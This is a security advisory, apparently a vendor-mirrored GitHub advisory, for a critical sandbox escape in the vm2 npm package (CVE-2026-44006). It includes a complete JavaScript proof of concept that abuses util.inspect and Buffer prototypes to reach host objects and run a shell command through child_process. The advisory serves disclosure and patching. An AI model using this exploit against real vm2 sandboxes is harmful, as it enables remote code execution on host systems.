CRITICAL 10.0 npm
vm2 has a Sandbox Escape Vulnerability
GHSA-qcp4-v2jj-fjx8 · CVE-2026-44006
Published · Modified
Description
Summary
It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes
Details
BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)
PoC
let obj = {
subarray: Buffer.prototype.inspect,
slice: Buffer.prototype.slice,
hexSlice: () => '',
};
let sym;
obj.slice(10, {
showHidden: true,
showProxy: true,
depth: 10,
stylize(a) {
const handler = this.seen && this.seen[1];
if (handler && handler.getPrototypeOf) {
gP = handler.getPrototypeOf;
HObjectProto = gP(gP(gP(gP(Buffer))));
HObject = HObjectProto.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
}
return a;
},
});
obj = {
[sym]: (depth, opt, inspect) => {
inspect.constructor('return process')()
.getBuiltinModule('child_process')
.execSync('id', { stdio: 'inherit' });
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
Impact
Sandbox Escape -> RCE
References
- WEB https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-44006
- PACKAGE https://github.com/patriksimek/vm2
- WEB https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
- WEB https://github.com/patriksimek/vm2/releases/tag/v3.11.0
Ready to move
Start Securing
Free, no credit card | First findings in minutes